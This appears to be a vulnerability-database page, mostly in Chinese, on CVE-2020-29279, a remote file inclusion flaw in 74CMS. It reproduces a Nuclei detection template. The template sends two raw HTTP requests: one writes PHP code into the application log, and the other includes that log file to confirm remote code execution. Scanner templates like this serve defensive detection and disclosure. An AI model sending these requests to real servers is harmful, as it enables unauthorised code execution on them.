CVE-2020-29279: 74CMS - Remote File Inclusion

日期: 2025-08-01 | 影响软件: 74CMS | POC: 已公开

漏洞描述

PHP remote file inclusion in the assign_resume_tpl method in Application/Common/Controller/BaseController.class.php in 74CMS before 6.0.48 allows remote code execution.

PoC代码[已公开]

id: CVE-2020-29279

info:
  name: 74CMS - Remote File Inclusion
  author: DhiyaneshDK
  severity: critical
  description: |
    PHP remote file inclusion in the assign_resume_tpl method in Application/Common/Controller/BaseController.class.php in 74CMS before 6.0.48 allows remote code execution.
  impact: |
    Remote attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to version 6.0.48 or later.
  reference:
    - https://github.com/Ares-X/VulWiki/blob/master/Web%E5%AE%89%E5%85%A8/74cms/74cms%20v6.0.48%E6%A8%A1%E7%89%88%E6%B3%A8%E5%85%A5%2B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABgetshell.md
    - https://www.wangan.com/p/7fyg8ka5a6f81cb6
    - https://cloud.tencent.com/developer/article/1856739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29279
    epss-score: 0.45342
    epss-percentile: 0.97452
    cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:*
  metadata:
    vendor: 74cms
    product: 74cms
    fofa-query: app="骑士-74CMS"
  tags: cve,cve2020,74cms,rce,intrusive,file-upload,vkev,vuln

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        variable=1&tpl=<?php phpinfo(); echo md5("{{num}}");ob_flush();?>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 404'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "ThinkPHP")'
        condition: and
        internal: true

  - raw:
      - |
        POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        variable=1&tpl=data/Runtime/Logs/Home/{{replace(date_time("%Y"), "20", "")}}_{{date_time("%M_%D",unix_time())}}.log

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Version"
          - "{{md5(num)}}"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022039513e469b726d5d704c3afe56ee46430863e071547f65575f81a4b8e6c7adc502202532c7421b450c9c97700d586f2203e8343b2dd5a631016cdcf739359e69a941:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-29279.yaml

相关漏洞推荐